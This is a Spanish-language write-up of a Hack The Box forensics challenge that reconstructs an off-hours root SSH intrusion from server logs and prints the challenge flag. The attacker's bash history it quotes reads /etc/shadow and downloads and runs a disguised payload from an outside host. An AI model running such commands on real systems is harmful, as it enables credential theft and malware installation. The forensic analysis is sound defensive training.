<- FORENSICS

An unusual sighting

4 minutos de lectura

Se nos proporcionan los siguientes archivos:

$ file *
bash_history.txt: ASCII text  
sshd.log:         ASCII text

Estos son archivos de un servidor de. El archivo bash_history.txt se refiere al historial de los comandos ejecutados en Bash, mientras que el archivo sshd.log es un registro de eventos relacionados con sesiones de SSH.

Tenemos una instancia remota en la que debemos responder algunas preguntas:

$ nc 94.237.51.149 43642

+---------------------+---------------------------------------------------------------------------------------------------------------------+  
|        Title        |                                                     Description                                                     |
+---------------------+---------------------------------------------------------------------------------------------------------------------+
| An unusual sighting |                        As the preparations come to an end, and The Fray draws near each day,                        |
|                     |             our newly established team has started work on refactoring the new CMS application for the competition. |
|                     |                  However, after some time we noticed that a lot of our work mysteriously has been disappearing!     |
|                     |                     We managed to extract the SSH Logs and the Bash History from our dev server in question.        |
|                     |               The faction that manages to uncover the perpetrator will have a massive bonus come the competition!   |
|                     |                                                                                                                     |
|                     |                                            Note: Operating Hours of Korp: 0900 - 1900                               |
+---------------------+---------------------------------------------------------------------------------------------------------------------+


Note 2: All timestamps are in the format they appear in the logs

Pregunta 1

What is the IP Address and Port of the SSH Server (IP:PORT)

Esta pregunta es bastante fácil de responder, porque veremos muchas ocurrencias de esta IP y puerto en el arvhivo sshd.log:

[2024-01-19 12:59:11] Server listening on 0.0.0.0 port 2221.
[2024-01-19 12:59:11] Server listening on :: port 2221.
[2024-01-28 15:24:23] Connection from 100.72.1.95 port 47721 on 100.107.36.130 port 2221 rdomain ""  
...

Entonces, el servidor está en 100.107.36.130, y escucha en el puerto 2221 para conexiones de SSH:

> 100.107.36.130:2221  
[+] Correct!

Pregunta 2

What time is the first successful Login

El primer inicio de sesión exitoso está aquí, porque dice “Accepted password for root”:

...
[2024-02-13 11:29:50] Connection from 100.81.51.199 port 63172 on 100.107.36.130 port 2221 rdomain ""
[2024-02-13 11:29:50] Failed publickey for root from 100.81.51.199 port 63172 ssh2: ECDSA SHA256:NdSnAx2935O7s2KX4LyvIV0gCzzQW5eXYoiiIBosqNE  
[2024-02-13 11:29:50] Accepted password for root from 100.81.51.199 port 63172 ssh2
[2024-02-13 11:29:50] Starting session: shell on pts/2 for root from 100.81.51.199 port 63172 id 0
...

> 2024-02-13 11:29:50  
[+] Correct!

Pregunta 3

What is the time of the unusual Login

El login inusual es el siguiente porque inicia sesión como root y la conexión proviene de una dirección IP que es muy diferente a las que se ven en el registro de SSH:

...
[2024-02-19 04:00:14] Connection from 2.67.182.119 port 60071 on 100.107.36.130 port 2221 rdomain ""
[2024-02-19 04:00:14] Failed publickey for root from 2.67.182.119 port 60071 ssh2: ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4  
[2024-02-19 04:00:14] Accepted password for root from 2.67.182.119 port 60071 ssh2
[2024-02-19 04:00:14] Starting session: shell on pts/2 for root from 2.67.182.119 port 60071 id 0
[2024-02-19 04:38:17] syslogin_perform_logout: logout() returned an error
[2024-02-19 04:38:17] Received disconnect from 2.67.182.119 port 60071:11: disconnected by user
[2024-02-19 04:38:17] Disconnected from user root 2.67.182.119 port 60071
...

> 2024-02-19 04:00:14  
[+] Correct!

Pregunta 4

What is the Fingerprint of the attacker's public key

La huella digital (fingerprint) de la clave pública se puede tomar de la evidencia anterior:

...
[2024-02-19 04:00:14] Failed publickey for root from 2.67.182.119 port 60071 ssh2: ECDSA SHA256:OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4  
...

> OPkBSs6okUKraq8pYo4XwwBg55QSo210F09FCe1-yj4  
[+] Correct!

Pregunta 5

What is the first command the attacker executed after logging in

Ahora, necesitamos analizar los comandos ejecutados por el atacante, así que tenemos que usar el archivo bash_history.txt, buscando los comandos ejecutados alrededor de la marca de tiempo anterior (2024-02-19 04:00:14):

...
[2024-02-16 14:40:47] python ./server.py --tests
[2024-02-19 04:00:18] whoami
[2024-02-19 04:00:20] uname -a
[2024-02-19 04:00:40] cat /etc/passwd
[2024-02-19 04:01:01] cat /etc/shadow
[2024-02-19 04:01:15] ps faux
[2024-02-19 04:02:27] wget https://gnu-packages.com/prebuilts/iproute2/latest.tar.gz -O /tmp/latest_iproute.tar.gz  
[2024-02-19 04:10:02] tar xvf latest.tar.gz
[2024-02-19 04:12:02] shred -zu latest.tar.gz
[2024-02-19 04:14:02] ./setup
[2024-02-20 11:11:14] nvim server.py
...

Entonces, el primer comando es whoami:

> whoami
[+] Correct!

Pregunta 6

What is the final command the attacker executed before logging out

Y la respuesta de esta pregunta ya se muestra en la salida anterior, que es ./setup:

> ./setup
[+] Correct!

Flag

En este punto, tenemos la flag:

[+] Here is the flag: HTB{4n_unusual_s1ght1ng_1n_SSH_l0gs!}